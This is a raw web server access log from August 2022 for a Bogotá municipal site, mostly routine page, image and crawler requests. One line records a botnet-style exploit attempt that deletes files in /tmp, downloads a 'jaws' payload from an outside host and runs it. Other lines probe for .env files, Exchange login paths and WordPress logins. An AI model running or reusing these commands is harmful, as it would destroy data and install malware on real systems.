186.84.90.91 - - [27/Aug/2022:22:07:23 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/EPCRJxVV2WgoG2kOnJym/zeScoeBJ1SUxBOOX6ylqvJKogbTJMPrz30HfDmz3pp2OXAJ7LR8a0WrKDi7k6Oe8lWYt9IdJ1Ei+vSKDz2NAdOj+Qcw62lTom/+E5PHXO6ZRZZ12kJXx5WBMoxS6Tx7BqDxJae3fyQBFl2Ld1+Sc5M6wWlsjXqgNc8UbvAL1kkF3TSljoHapqIJ/EJo0CBrdIYqQwrCm8CSjVldGmn//WwYrZ1nI7IwG/U+IQLHtyUqLUX2VHI2Nsg==&u=U2FsdGVkX1+yIH7jR0QM/xo26Oo3NI/0dr4auAtEsmE=&y=U2FsdGVkX1/WLbZ8E5Z0nh2tBIECQh7CvfJhC7ca/jfuLnQCozdyZ0ZaSoN1bbgX HTTP/1.1" 200 25
186.84.90.91 - - [27/Aug/2022:22:07:23 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1+yIH7jR0QM/xo26Oo3NI/0dr4auAtEsmE=&y=U2FsdGVkX1/WLbZ8E5Z0nh2tBIECQh7CvfJhC7ca/jfuLnQCozdyZ0ZaSoN1bbgX HTTP/1.1" 200 25
186.84.90.91 - - [27/Aug/2022:22:07:23 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX191Rp0lhLNCtEwkiEHXV9PaNAoyex8Ek7fuNWikmzZObXzgvHnHvETdP+wCyHcXwzuesipn0rd9+R8Zm2TOaP1p3LWei0wQwF0FSR7fnUOsCl8v1nSpvKmLCEpXo7eaOvNWlWL+KFlGzQvKJJ1ZHwrIx/41KvjvmtE=&u=U2FsdGVkX1+yIH7jR0QM/xo26Oo3NI/0dr4auAtEsmE=&y=U2FsdGVkX1/WLbZ8E5Z0nh2tBIECQh7CvfJhC7ca/jfuLnQCozdyZ0ZaSoN1bbgX HTTP/1.1" 200 25
186.84.90.91 - - [27/Aug/2022:22:07:23 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/u9oVFbS2D92nAA/+VFJSr92iZjjfS8AYHd/OdK503vG212Ai9S1bW1FCIMJaCKhR54vrFt17NqRMWkQq1Glqb2YHXn+sWcMurfFxLB6WJ4psFklbGJ4WAKaHn2iGoc3WDUjARbbj3f1JaBno6GU/3TiYgnubAUiw=&u=U2FsdGVkX1+yIH7jR0QM/xo26Oo3NI/0dr4auAtEsmE=&y=U2FsdGVkX1/WLbZ8E5Z0nh2tBIECQh7CvfJhC7ca/jfuLnQCozdyZ0ZaSoN1bbgX HTTP/1.1" 200 25
186.84.90.91 - - [27/Aug/2022:22:07:23 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Lhbfa8L35NJGSMOVBZrhqtw3ZDPaAXsB0IQ5W0/BLZcthkMA205tKXgppqbsRXE94tv4xIsIr/5lXf9IlPO/AINK70vbcig13n47UOtz7sq76hCK9AH3MhAr/juv0qkY9ES4hq8h4O3Jdtbxv5e6p6vDE2PjXnfY=&u=U2FsdGVkX1+yIH7jR0QM/xo26Oo3NI/0dr4auAtEsmE=&y=U2FsdGVkX1/WLbZ8E5Z0nh2tBIECQh7CvfJhC7ca/jfuLnQCozdyZ0ZaSoN1bbgX HTTP/1.1" 200 25
186.84.90.91 - - [27/Aug/2022:22:07:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX187OuB5YpgK1VV5lPPvZb2Ggww5JTA0vAuYIxq5ASmmkk3q6FRzFrEb4AjMRY32T6y2Q1WC4LHrtyx+dDw95KsTsx4AxPIEEYzs4qU+IG4Wy9qqKxLNrypDJrWSmReYmJB4aHff9HmpKtF/eIk6Bj5C0BmQ8rfjYWgi6AxVkdNB++GTyV9jUziV&u=U2FsdGVkX1+yIH7jR0QM/xo26Oo3NI/0dr4auAtEsmE=&y=U2FsdGVkX1/WLbZ8E5Z0nh2tBIECQh7CvfJhC7ca/jfuLnQCozdyZ0ZaSoN1bbgX HTTP/1.1" 200 25
172.22.2.4 - - [27/Aug/2022:22:07:53 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
172.22.2.4 - - [27/Aug/2022:22:06:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
201.245.192.253 - - [27/Aug/2022:22:09:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [27/Aug/2022:22:11:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:11:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:12:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
172.22.2.4 - - [27/Aug/2022:22:14:50 -0500] "GET /BLA/boletinlegal/owa/auth/x.js HTTP/1.1" 404 1018
201.245.192.253 - - [27/Aug/2022:22:14:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [27/Aug/2022:22:14:57 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx HTTP/1.1" 404 1018
172.22.2.4 - - [27/Aug/2022:22:15:05 -0500] "GET /BLA/boletinlegal/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
172.22.2.4 - - [27/Aug/2022:22:16:47 -0500] "GET /BLA/boletinlegal/admin/ HTTP/1.1" 200 2324
172.22.2.4 - - [27/Aug/2022:22:16:48 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
216.245.221.92 - - [27/Aug/2022:22:16:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:17:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Aug/2022:22:19:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43882
201.245.192.253 - - [27/Aug/2022:22:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41370
172.22.2.4 - - [27/Aug/2022:22:18:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [27/Aug/2022:22:19:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.64.45 - - [27/Aug/2022:22:20:28 -0500] "-" 408 -
172.22.2.4 - - [27/Aug/2022:22:21:22 -0500] "GET /BLA/boletinlegal/calendario%20trimestral/flatpickr-events-calendar/dist/? HTTP/1.1" 404 1029
216.245.221.92 - - [27/Aug/2022:22:21:49 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.36 - - [27/Aug/2022:22:23:51 -0500] "GET /galeria/galeria/fotos/2GuaymaralTorcaG2.jpg HTTP/1.1" 200 28916
172.22.2.4 - - [27/Aug/2022:22:23:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Aug/2022:22:24:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [27/Aug/2022:22:24:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56367
216.245.221.92 - - [27/Aug/2022:22:26:49 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.34 - - [27/Aug/2022:22:27:02 -0500] "GET /portaldeninos/2021/06/05/celebracion-del-dia-mundial-del-medio-ambiente-comenzo-desde-uno-de-los-pulmones-de-bogota/ HTTP/1.1" 200 104357
64.124.8.53 - - [27/Aug/2022:22:27:05 -0500] "-" 408 -
66.249.64.45 - - [27/Aug/2022:22:27:37 -0500] "-" 408 -
173.252.127.14 - - [27/Aug/2022:22:28:46 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
190.157.213.95 - - [27/Aug/2022:22:28:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.157.213.95 - - [27/Aug/2022:22:28:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.157.213.95 - - [27/Aug/2022:22:28:55 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [27/Aug/2022:22:29:10 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
201.245.192.253 - - [27/Aug/2022:22:29:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43882
201.245.192.253 - - [27/Aug/2022:22:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41370
201.245.192.253 - - [27/Aug/2022:22:29:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [27/Aug/2022:22:29:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.118 - - [27/Aug/2022:22:31:05 -0500] "GET /images/caminos-cerros-orientales-7-abril.jpg HTTP/1.1" 200 80138
173.252.107.7 - - [27/Aug/2022:22:31:05 -0500] "GET /en-epoca-de-lluvias-algunos-animales-silvestres-pueden-ser-mas-visibles-en-zonas-de-la-ciudad-cuidalos.html HTTP/1.1" 206 976
66.220.149.1 - - [27/Aug/2022:22:31:06 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
173.252.107.3 - - [27/Aug/2022:22:31:22 -0500] "GET /caminos-de-los-cerros-habilitados-en-esta-semana-santa-2022.html HTTP/1.1" 206 832
172.22.2.4 - - [27/Aug/2022:22:29:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56723
173.252.111.10 - - [27/Aug/2022:22:31:45 -0500] "GET /mas-de-70-animales-silvestres-regresaron-a-la-libertad-en-el-humedal-juan-amarillo.html HTTP/1.1" 206 958
173.252.111.1 - - [27/Aug/2022:22:31:45 -0500] "GET /mas-de-70-animales-silvestres-regresaron-a-la-libertad-en-el-humedal-juan-amarillo.html HTTP/1.1" 206 958
216.245.221.92 - - [27/Aug/2022:22:31:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Aug/2022:22:34:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [27/Aug/2022:22:34:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/Aug/2022:22:36:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:35:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
64.124.8.41 - - [27/Aug/2022:22:38:21 -0500] "GET /transparencia/General%20Asignado/Historico HTTP/1.1" 301 273
201.245.192.253 - - [27/Aug/2022:22:39:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43882
201.245.192.253 - - [27/Aug/2022:22:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41370
172.22.2.4 - - [27/Aug/2022:22:38:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63198
201.245.192.253 - - [27/Aug/2022:22:39:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [27/Aug/2022:22:41:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:41:53 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [27/Aug/2022:22:41:59 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [27/Aug/2022:22:42:10 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [27/Aug/2022:22:40:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
197.63.136.7 - - [27/Aug/2022:22:42:37 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
157.55.39.80 - - [27/Aug/2022:22:43:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/874.tif HTTP/1.1" 200 73632
172.22.2.4 - - [27/Aug/2022:22:41:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
201.245.192.253 - - [27/Aug/2022:22:44:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
89.187.175.246 - - [27/Aug/2022:22:45:09 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
216.245.221.92 - - [27/Aug/2022:22:46:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:46:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:47:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
66.249.64.49 - - [27/Aug/2022:22:49:47 -0500] "-" 408 -
201.245.192.253 - - [27/Aug/2022:22:49:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [27/Aug/2022:22:51:49 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.41 - - [27/Aug/2022:22:52:00 -0500] "GET /transparencia/General%20Asignado/Vigencia%20actual HTTP/1.1" 301 281
172.22.2.4 - - [27/Aug/2022:22:52:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Aug/2022:22:54:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [27/Aug/2022:22:53:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
216.245.221.92 - - [27/Aug/2022:22:56:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:56:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
173.252.95.118 - - [27/Aug/2022:22:57:11 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
207.46.13.36 - - [27/Aug/2022:22:57:26 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
66.249.64.45 - - [27/Aug/2022:22:58:56 -0500] "-" 408 -
201.245.192.253 - - [27/Aug/2022:22:59:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [27/Aug/2022:22:58:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:22:59:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [27/Aug/2022:22:59:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
172.22.2.4 - - [27/Aug/2022:23:01:06 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [27/Aug/2022:23:01:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:01:07 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63198
172.22.2.4 - - [27/Aug/2022:23:04:35 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [27/Aug/2022:23:04:35 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 200 1118749
201.245.192.253 - - [27/Aug/2022:23:04:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.106 - - [27/Aug/2022:23:05:26 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [27/Aug/2022:23:05:27 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [27/Aug/2022:23:04:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:04:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
172.22.2.4 - - [27/Aug/2022:23:06:35 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Jurisprudencia%20Sent%202000-00005-01.doc HTTP/1.1" 304 -
181.59.20.60 - - [27/Aug/2022:23:06:40 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [27/Aug/2022:23:06:49 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.45 - - [27/Aug/2022:23:08:29 -0500] "-" 408 -
201.245.192.253 - - [27/Aug/2022:23:09:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.186 - - [27/Aug/2022:23:10:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=uodft01wlhvus-t0shwvigwx.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
172.22.2.4 - - [27/Aug/2022:23:09:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/Aug/2022:23:11:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:10:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
165.22.120.86 - - [27/Aug/2022:23:12:47 -0500] "GET / HTTP/1.0" 200 319
207.46.13.16 - - [27/Aug/2022:23:13:15 -0500] "GET /catalogoisis/js/limpiarcombinada.js HTTP/1.1" 200 207
201.245.192.253 - - [27/Aug/2022:23:14:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
83.218.213.139 - - [27/Aug/2022:23:15:09 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [27/Aug/2022:23:13:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63198
64.124.8.54 - - [27/Aug/2022:23:15:43 -0500] "GET /portaldeninos/2021/05/30/biodiversidad/ HTTP/1.1" 200 92930
216.245.221.92 - - [27/Aug/2022:23:16:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:15:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:16:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54347
157.55.39.8 - - [27/Aug/2022:23:19:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 219900
201.245.192.253 - - [27/Aug/2022:23:19:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43879
201.245.192.253 - - [27/Aug/2022:23:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41361
201.245.192.253 - - [27/Aug/2022:23:19:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [27/Aug/2022:23:21:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:22:29 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [27/Aug/2022:23:21:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:22:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
157.55.39.8 - - [27/Aug/2022:23:24:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20200-249.tif HTTP/1.1" 200 6293319
201.245.192.253 - - [27/Aug/2022:23:24:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [27/Aug/2022:23:26:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:27:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Aug/2022:23:29:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43879
201.245.192.253 - - [27/Aug/2022:23:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41361
17.121.115.90 - - [27/Aug/2022:23:29:36 -0500] "-" 408 -
201.245.192.253 - - [27/Aug/2022:23:29:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [27/Aug/2022:23:28:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [27/Aug/2022:23:31:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:32:21 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 58154
201.245.192.253 - - [27/Aug/2022:23:34:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.36 - - [27/Aug/2022:23:34:47 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
207.46.13.36 - - [27/Aug/2022:23:34:47 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
172.22.2.4 - - [27/Aug/2022:23:33:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.8 - - [27/Aug/2022:23:34:52 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
207.46.13.115 - - [27/Aug/2022:23:34:56 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
172.22.2.4 - - [27/Aug/2022:23:34:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [27/Aug/2022:23:36:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Aug/2022:23:39:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43879
201.245.192.253 - - [27/Aug/2022:23:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41361
201.245.192.253 - - [27/Aug/2022:23:39:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.107.22 - - [27/Aug/2022:23:40:03 -0500] "GET /images/Aguanoso2.jpeg HTTP/1.1" 200 128232
173.252.107.119 - - [27/Aug/2022:23:40:04 -0500] "GET /secretaria-de-ambiente-realizo-piloto-antes-de-apertura-oficial-del-camino-de-los-cerros-guadalupe-aguanoso.html HTTP/1.1" 206 982
173.252.95.116 - - [27/Aug/2022:23:40:10 -0500] "GET /images/Aguanoso2.jpeg HTTP/1.1" 200 128232
172.22.2.4 - - [27/Aug/2022:23:39:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:39:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 41326
181.60.166.33 - - [27/Aug/2022:23:41:28 -0500] "GET /secretaria-de-ambiente-realizo-piloto-antes-de-apertura-oficial-del-camino-de-los-cerros-guadalupe-aguanoso.html?fbclid=IwAR2WrksfCNSRpYL4fMHDELaSP0GhknDg7PtjL5XBYaF3PCqk_GotItfGnHc HTTP/1.1" 200 982
172.22.2.4 - - [27/Aug/2022:23:39:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 41326
216.245.221.92 - - [27/Aug/2022:23:41:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:43:15 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [27/Aug/2022:23:43:20 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
190.66.120.111 - - [27/Aug/2022:23:44:05 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
190.66.120.111 - - [27/Aug/2022:23:44:05 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
190.66.120.111 - - [27/Aug/2022:23:44:05 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
190.66.120.111 - - [27/Aug/2022:23:44:05 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
190.66.120.111 - - [27/Aug/2022:23:44:05 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
190.66.120.111 - - [27/Aug/2022:23:44:05 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.66.120.111 - - [27/Aug/2022:23:44:13 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
190.66.120.111 - - [27/Aug/2022:23:44:16 -0500] "POST /appsia/controlador HTTP/1.1" 200 12024
190.66.120.111 - - [27/Aug/2022:23:44:16 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
